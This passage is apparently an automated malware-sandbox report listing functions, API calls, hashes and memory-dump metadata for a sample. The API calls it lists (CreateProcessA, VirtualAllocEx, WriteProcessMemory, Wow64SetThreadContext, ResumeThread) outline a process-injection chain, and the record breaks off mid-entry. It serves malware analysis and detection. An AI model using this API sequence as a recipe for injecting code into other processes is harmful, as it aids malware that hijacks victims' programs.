Opcode ID: e94e8ddc626c52db2fec5091d17ac5107202bf12ebb770e63489ec1b01b05f9f
Instruction ID: 26201086756ec025c5017ad77d4304c0ace1bff8f9ef18bfdb972ce2e23e9dfd
Opcode Fuzzy Hash: e94e8ddc626c52db2fec5091d17ac5107202bf12ebb770e63489ec1b01b05f9f
Instruction Fuzzy Hash: 742115B0D056189BEB18CFABD80479EFFB6AFC9300F04C06AD408AA255DB7509458F90

Function 009DCF90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 009DD01E
GetCurrentThread.KERNEL32 ref: 009DD05B
GetCurrentProcess.KERNEL32 ref: 009DD098
GetCurrentThreadId.KERNEL32 ref: 009DD0F1

Strings

rB&-, xrefs: 009DCFBC

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: Current$ProcessThread
String ID: rB&-
API String ID: 2063062207-359477748
Opcode ID: 38ecfcf997982060ac6946ba4c21f05e234e76e0ead838379a6f798afa749853
Instruction ID: 6644eca8d38aacd9839ac18cbdbcda2aacd4168af775508cad359d67170d8014
Opcode Fuzzy Hash: 38ecfcf997982060ac6946ba4c21f05e234e76e0ead838379a6f798afa749853
Instruction Fuzzy Hash: B15176B09053498FDB24CFA9C948BDEBBF1EF89314F24845AE408A7390C7345848CB66

Function 009DCFA0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 009DD01E
GetCurrentThread.KERNEL32 ref: 009DD05B
GetCurrentProcess.KERNEL32 ref: 009DD098
GetCurrentThreadId.KERNEL32 ref: 009DD0F1

Strings

rB&-, xrefs: 009DCFBC

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: Current$ProcessThread
String ID: rB&-
API String ID: 2063062207-359477748
Opcode ID: f7fbc2f6d37a176a0a7fe87a2b1866bc4bb379fc2103726328467d601af2e342
Instruction ID: d2e8d90fa735982dbc46cf179b760b394d34fffd55e641442840de44e3daebb5
Opcode Fuzzy Hash: f7fbc2f6d37a176a0a7fe87a2b1866bc4bb379fc2103726328467d601af2e342
Instruction Fuzzy Hash: 405166B09013098FDB24CFAAD948BDEBBF5FF88314F208459E418A7390D7745948CB66

Function 06D17A2C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D17C6E

Strings

rB&-, xrefs: 06D17A73
rB&-, xrefs: 06D17AA2

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: CreateProcess
String ID: rB&-$rB&-
API String ID: 963392458-1154696975
Opcode ID: 2890bcbb5e92203a7b6a66c2ed7d3a8ba78631406600a4eab04a85ddc48b1409
Instruction ID: 7e853d4123b8ee40ce4e97738eaba2f8542dba3b0ae15a7ba8c2c92785845801
Opcode Fuzzy Hash: 2890bcbb5e92203a7b6a66c2ed7d3a8ba78631406600a4eab04a85ddc48b1409
Instruction Fuzzy Hash: 5BA17C71D00219DFDF60DF68D941BEEBBB2BF48310F1485A9E809AB250DBB49985CF91

Function 06D17A38 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D17C6E

Strings

rB&-, xrefs: 06D17A73
rB&-, xrefs: 06D17AA2

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: CreateProcess
String ID: rB&-$rB&-
API String ID: 963392458-1154696975
Opcode ID: 5dcedaa191f9bdaa3e94eef76de49f63a40967140572c766712e795fb906c62a
Instruction ID: 62aeb1ae219d378064a3f9c79c2ac27b3bb0c5b1f12fb4a1c467aa800470dc18
Opcode Fuzzy Hash: 5dcedaa191f9bdaa3e94eef76de49f63a40967140572c766712e795fb906c62a
Instruction Fuzzy Hash: EA918C71D00219DFDF60CFA8D941BEEBBB2BF48310F1085A9D809AB250DBB49981CF91

Function 009DAD08 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 009DAF5E

Strings

rB&-, xrefs: 009DAF17

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: HandleModule
String ID: rB&-
API String ID: 4139908857-359477748
Opcode ID: 5f76c6661c7a53786fef0b54c081abb4d67dbb71f58732b98d7fa8d9f9df0889
Instruction ID: d627db61719efb354a19a5c24db29a37ea167428de71f934ecf72fac8af5d0e5
Opcode Fuzzy Hash: 5f76c6661c7a53786fef0b54c081abb4d67dbb71f58732b98d7fa8d9f9df0889
Instruction Fuzzy Hash: 20712370A00B058FDB24DF69D44179ABBF5FF88300F00892AD48AD7B90D775E959CB92

Function 009D58EC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009D59A9

Strings

rB&-, xrefs: 009D592C

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: Create
String ID: rB&-
API String ID: 2289755597-359477748
Opcode ID: ba5507f5cec26722e1a1a1048529f376861e81ee80498c39190f98ac908ba239
Instruction ID: 884f0a8e3d8180ff92bd2d5e2dd0aed4787de494b1fc5678e99c476150a92af4
Opcode Fuzzy Hash: ba5507f5cec26722e1a1a1048529f376861e81ee80498c39190f98ac908ba239
Instruction Fuzzy Hash: 9E41D0B0C00619CEDB24CFA9C984ADEBBB5FF89304F20815AD449AB255DB75694ACF90

Function 009D44B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009D59A9

Strings

rB&-, xrefs: 009D592C

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: Create
String ID: rB&-
API String ID: 2289755597-359477748
Opcode ID: 4ae8de45bfa055fd0d357f892df59cf8d46692445b2ab28bcf8fc970fd11386b
Instruction ID: 03a1cf93912013498370657d78b594cc1b903d802cb72795fcfb410f86a67acf
Opcode Fuzzy Hash: 4ae8de45bfa055fd0d357f892df59cf8d46692445b2ab28bcf8fc970fd11386b
Instruction Fuzzy Hash: 1141B0B0C0072DCBDB24DFA9C984B9EBBB5FF49304F20816AD409AB255DB756949CF90

Function 06D177A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D17840

Strings

rB&-, xrefs: 06D177CF

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: rB&-
API String ID: 3559483778-359477748
Opcode ID: 818593941a4718949042f729871aad9ba46bb37355279a82f65f893ebd4abcc9
Instruction ID: 4d63ccf809730ec10892b2ba267b9d27b7a97efc1529fe5dedb7b3a31bf30e1c
Opcode Fuzzy Hash: 818593941a4718949042f729871aad9ba46bb37355279a82f65f893ebd4abcc9
Instruction Fuzzy Hash: 122126B19003599FCB10CFA9C885BDEBBF5FF48320F108429E958A7251C7789544DBA1

Function 06D177B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D17840

Strings

rB&-, xrefs: 06D177CF

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: rB&-
API String ID: 3559483778-359477748
Opcode ID: 805d6fe7d5c033f49afb76b65950cfed8e9b20ab574de366f914a30b96271c8c
Instruction ID: dce4fcec2a1821159515cdc570a35e60a1cfd4f02566e76b675bdacd88f1a6f9
Opcode Fuzzy Hash: 805d6fe7d5c033f49afb76b65950cfed8e9b20ab574de366f914a30b96271c8c
Instruction Fuzzy Hash: 592127B1D003499FCB10CFA9C885BDEBBF5FF48320F10842AE959A7250C7789944DBA4

Function 009DD5E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009DD677

Strings

rB&-, xrefs: 009DD60F

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: DuplicateHandle
String ID: rB&-
API String ID: 3793708945-359477748
Opcode ID: 8a2adf1e0e61728193c2cf0ca3bcb47525b16f474b3964420c02e4d181c834c1
Instruction ID: 7512302203e3d98bc9415870f413d813ec8e415be829d666fa3c3ea7304d6ae4
Opcode Fuzzy Hash: 8a2adf1e0e61728193c2cf0ca3bcb47525b16f474b3964420c02e4d181c834c1
Instruction Fuzzy Hash: 2921E5B5901208DFDB10CF9AD985ADEBFF9FB48320F14811AE958A7350C378A945DFA1

Function 06D1789B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D17920

Strings

rB&-, xrefs: 06D178BF

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: MemoryProcessRead
String ID: rB&-
API String ID: 1726664587-359477748
Opcode ID: 84404c3270bec4305998cbb19eb322b1f9db208138877ae7f76fc3056317c0fd
Instruction ID: efc15279efbebb4e8588ee36c72c06fbecf91d6bf65350ef79d0094e481ddbe3
Opcode Fuzzy Hash: 84404c3270bec4305998cbb19eb322b1f9db208138877ae7f76fc3056317c0fd
Instruction Fuzzy Hash: 132128B1D003599FCB10DFAAD881ADEBBF5FF48320F10842AE558A7250C7799944DBA1

Function 06D171D9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1725E

Strings

rB&-, xrefs: 06D171FC

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: ContextThreadWow64
String ID: rB&-
API String ID: 983334009-359477748
Opcode ID: ff3e1cf7ba4fb5bdc0d4a88939a2eaaff9740cf71582e67100406b629f98bab2
Instruction ID: 33208329cd9ceacf4d815cba2eedcd4f2b3b2fec11eab644806938d191a00632
Opcode Fuzzy Hash: ff3e1cf7ba4fb5bdc0d4a88939a2eaaff9740cf71582e67100406b629f98bab2
Instruction Fuzzy Hash: 7B213CB1D003099FDB24DFAAC485BDEBBF5EF48324F14842AE559AB240CB789545CFA1

Function 06D178A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D17920

Strings

rB&-, xrefs: 06D178BF

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: MemoryProcessRead
String ID: rB&-
API String ID: 1726664587-359477748
Opcode ID: 233add51a0120af127be02f12fd988e01169768ba604541a0a8dc3ace1a8f4ad
Instruction ID: c0636f167a964aecba9d157e48b2d46052ce2e5aa78218df105455ab89717b77
Opcode Fuzzy Hash: 233add51a0120af127be02f12fd988e01169768ba604541a0a8dc3ace1a8f4ad
Instruction Fuzzy Hash: CB2139B1C003499FCB10DFAAC881ADEFBF5FF48320F10842AE558A7250C7789944DBA1

Function 06D171E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1725E

Strings

rB&-, xrefs: 06D171FC

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: ContextThreadWow64
String ID: rB&-
API String ID: 983334009-359477748
Opcode ID: 2c274e0b248f970f94fe5b5a5f5f7585d05608338de793d6108a698e80e45196
Instruction ID: 8ffff26c886f0ff1984ff2bc45bf58660e94068c84c0bf6584eaaf2301666cd1
Opcode Fuzzy Hash: 2c274e0b248f970f94fe5b5a5f5f7585d05608338de793d6108a698e80e45196
Instruction Fuzzy Hash: EA2109B1D003099FDB10DFAAC585BAEBBF4EF48324F14842AD559A7250C7789545CFA1

Function 009DD5F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 009DD677

Strings

rB&-, xrefs: 009DD60F

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: DuplicateHandle
String ID: rB&-
API String ID: 3793708945-359477748
Opcode ID: e250bd4b1d3bfc6b594463653846ce23c4bf699136a8fb39bbe4be6bc2c0e4e9
Instruction ID: f79d6a7ed825baf73bc4181fdc7c5c5b81999240cc2a37a3c6cb8888eb9baef4
Opcode Fuzzy Hash: e250bd4b1d3bfc6b594463653846ce23c4bf699136a8fb39bbe4be6bc2c0e4e9
Instruction Fuzzy Hash: A921E4B5901208DFDB10CF9AD984ADEBBF8FB48320F14801AE918A3350C374A940CFA5

Function 06D176E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1775E

Strings

rB&-, xrefs: 06D17707

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: AllocVirtual
String ID: rB&-
API String ID: 4275171209-359477748
Opcode ID: 1f14f91102728ff8377394b29b0686b1f61a690751ad3e096c7796335bcdc0ec
Instruction ID: 5c61d5b4a7bd8ea75e0b7b63c600744175296c8903f463347decc3b07f47de42
Opcode Fuzzy Hash: 1f14f91102728ff8377394b29b0686b1f61a690751ad3e096c7796335bcdc0ec
Instruction Fuzzy Hash: EE218971900349DFCB20CFAAC845ADEBFF5EF48320F20841AE559AB250C7B59540CFA1

Function 06D17128 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D17192

Strings

rB&-, xrefs: 06D17147

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: ResumeThread
String ID: rB&-
API String ID: 947044025-359477748
Opcode ID: 157389a9285b8e2173319b55a0550bc76182c86a9f5740f89f2d7171366d7802
Instruction ID: c23828751b75d1f359598883acda07cdd47423e08ee7cf8ad8e7ffa7c56e2cf4
Opcode Fuzzy Hash: 157389a9285b8e2173319b55a0550bc76182c86a9f5740f89f2d7171366d7802
Instruction Fuzzy Hash: AE1137B19002498FDB20DFAAC845ADFBFF8AB88324F248419D559A7250CB756544CBA5

Function 06D176F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1775E

Strings

rB&-, xrefs: 06D17707

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: AllocVirtual
String ID: rB&-
API String ID: 4275171209-359477748
Opcode ID: c197646c133946dcf1d0034e3ea91cb86aac6f82759a635001301b645b2cfebf
Instruction ID: 1f9cab9d66022426e3aa07ee4f60d251129ebe4dfa5b681b070d82ab91ae8b4b
Opcode Fuzzy Hash: c197646c133946dcf1d0034e3ea91cb86aac6f82759a635001301b645b2cfebf
Instruction Fuzzy Hash: 2F1126B19002499FDB10DFAAC845ADEBFF5EF88320F24841AE519A7250C775A540DBA1

Function 06D17130 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06D17192

Strings

rB&-, xrefs: 06D17147

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: ResumeThread
String ID: rB&-
API String ID: 947044025-359477748
Opcode ID: 89284fbe3e591f21a7c1e29e75eae31aee8869322848fbb29f90ac8b662e2726
Instruction ID: 650f44b4bed8ce1bb741dda46ad7216ff3c37dfbb50c519426580c06464d15a9
Opcode Fuzzy Hash: 89284fbe3e591f21a7c1e29e75eae31aee8869322848fbb29f90ac8b662e2726
Instruction Fuzzy Hash: D71128B1D003498FDB20DFAAC84579EFBF5AF88324F248419D519A7250C7756544CBA1

Function 009DAEF8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 009DAF5E

Strings

rB&-, xrefs: 009DAF17

Memory Dump Source

Source File: 00000000.00000002.2089005568.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9d0000_8ZVd2S51fr.jbxd

Similarity

API ID: HandleModule
String ID: rB&-
API String ID: 4139908857-359477748
Opcode ID: 11bed58f9aaf8e016ef1e6846127ecdbbc711bd6b6b5378ffa6201a9c1058098
Instruction ID: 9912b450c493145d80d54171db9fe74b55682578d8a1eda7bf05f29ceda28fc1
Opcode Fuzzy Hash: 11bed58f9aaf8e016ef1e6846127ecdbbc711bd6b6b5378ffa6201a9c1058098
Instruction Fuzzy Hash: EE11DFB5C003498FCB20CF9AC844ADEFBF8EB88324F24855AD859A7710C379A545CFA1

Function 06D143B8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D1A30D

Strings

rB&-, xrefs: 06D1A2CA

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: MessagePost
String ID: rB&-
API String ID: 410705778-359477748
Opcode ID: 87c4bf77e0e471b0151432dfd1a0efe8e43e6b8f67c214c4832500a8a374b55e
Instruction ID: cf8c17fee5756969b72884a25973f29559efdcedda4e6dfb19b1efd0dbc7dda6
Opcode Fuzzy Hash: 87c4bf77e0e471b0151432dfd1a0efe8e43e6b8f67c214c4832500a8a374b55e
Instruction Fuzzy Hash: 1711F5B5804349DFDB10DF9AD985BDEBBF8EB48320F24841AE954A7240C3B5A944CFA5

Function 06D1A2A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06D1A30D

Strings

rB&-, xrefs: 06D1A2CA

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: MessagePost
String ID: rB&-
API String ID: 410705778-359477748
Opcode ID: 8ee9d42753ab9bc87ac45869bfe6ba3952582d827d38749590c6f73d39ecb472
Instruction ID: 2c83a7af2c95a367cb213b40b78f3beca9c7d14f2c0c11a181c9860a06b27d82
Opcode Fuzzy Hash: 8ee9d42753ab9bc87ac45869bfe6ba3952582d827d38749590c6f73d39ecb472
Instruction Fuzzy Hash: 5B11F2B58003499FDB10CF9AD985BDEBBF8EB48320F24841AD958A7710C375A944CFA1

Function 06D1B9DF Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 06D1BA38

Strings

rB&-, xrefs: 06D1B9FA

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: CloseHandle
String ID: rB&-
API String ID: 2962429428-359477748
Opcode ID: a2407f7a6f8e0b7501276c40922514afbe2485011087ddf6c62e3b00f3b99a9a
Instruction ID: d6bd4feccaa492cdccee7964b18f06c9658c1a3ca92a81155f2c6c5a8de8ea0f
Opcode Fuzzy Hash: a2407f7a6f8e0b7501276c40922514afbe2485011087ddf6c62e3b00f3b99a9a
Instruction Fuzzy Hash: 6F1103B5800349DFCB20DF9AD985BDEBBF4EB48320F24841AD958A7340D778A544CFA5

Function 06D1B9E0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 06D1BA38

Strings

rB&-, xrefs: 06D1B9FA

Memory Dump Source

Source File: 00000000.00000002.2091375470.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d10000_8ZVd2S51fr.jbxd

Similarity

API ID: CloseHandle
String ID: rB&-
API String ID: 2962429428-359477748
Opcode ID: a30267723bbb166bac8b255a0f7652d8bf7a919c3f14b5c4988ec823b742f743
Instruction ID: 8c2ee4c11727af2bbb1d29d0506794ef9af8eb21eb48b10ac38a5e66fdfdb0c5
Opcode Fuzzy Hash: a30267723bbb166bac8b255a0f7652d8bf7a919c3f14b5c4988ec823b742f743
Instruction Fuzzy Hash: 0B1103B5800349DFCB10DF9AD985BDEBBF4EB48320F24841AD958A7340D778A544CFA5

Function 0086D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088732823.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 327fe3ad16814b916fa8910def7d1c38ce3846d4b9845a3a6c73ab314e8989d4
Instruction ID: 9d59c89a8d5c81e659841f8cb86e98c1b34293b95c808b3d1bc9cc6dedeac98f
Opcode Fuzzy Hash: 327fe3ad16814b916fa8910def7d1c38ce3846d4b9845a3a6c73ab314e8989d4
Instruction Fuzzy Hash: 592124B1A04344DFCB04DF04C9C0F26BB65FB98324F24C569E9098B256C736E846CAA1

Function 0087D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088797713.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_87d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6afd2274d96a6342ec727db2b4500157338c0690d7d2186c57fff607aa5e1007
Instruction ID: fe3760ee03ae2393a5acca8f24bf84e567e2f6ffe1660ca89f267ca49eea59a2
Opcode Fuzzy Hash: 6afd2274d96a6342ec727db2b4500157338c0690d7d2186c57fff607aa5e1007
Instruction Fuzzy Hash: FB21C1B1614304AFDB05DF14D5C0B26BB75FF84318F24C569E94D8B25AC336E846DA61

Function 0087D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088797713.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_87d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8cf38cc275b897b956dbecc290130fe5616cfc98415d5e3a993d9e92d7891e
Instruction ID: 0b82cf37dc8daf5d671f23dc148e5965e2728fc8ebbf669c05d3024cc63fe816
Opcode Fuzzy Hash: 0d8cf38cc275b897b956dbecc290130fe5616cfc98415d5e3a993d9e92d7891e
Instruction Fuzzy Hash: A221CFB56047049FCB14DF14D980B26BB75FB84318F24C969E90E8B29AC33AD847CA61

Function 0086D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088732823.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 6f5f32a6d1271c9d6d84aafd67363d585434f58f5f176df7c01614a8e70ead3d
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 1111E172904340CFCB12CF00D5C0B16BF72FB94324F24C2A9D9094B656C33AE85ACBA1

Function 0087D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088797713.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_87d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: f7620eb85aafb9db2d789c3fd128fae872df485902a39bf68a5db1f807bf336f
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 4711BB75504780CFCB11CF14D5C4B15BBB2FB84318F28C6AAD80D8B65AC33AD84ACBA2

Function 0087D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088797713.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_87d000_8ZVd2S51fr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
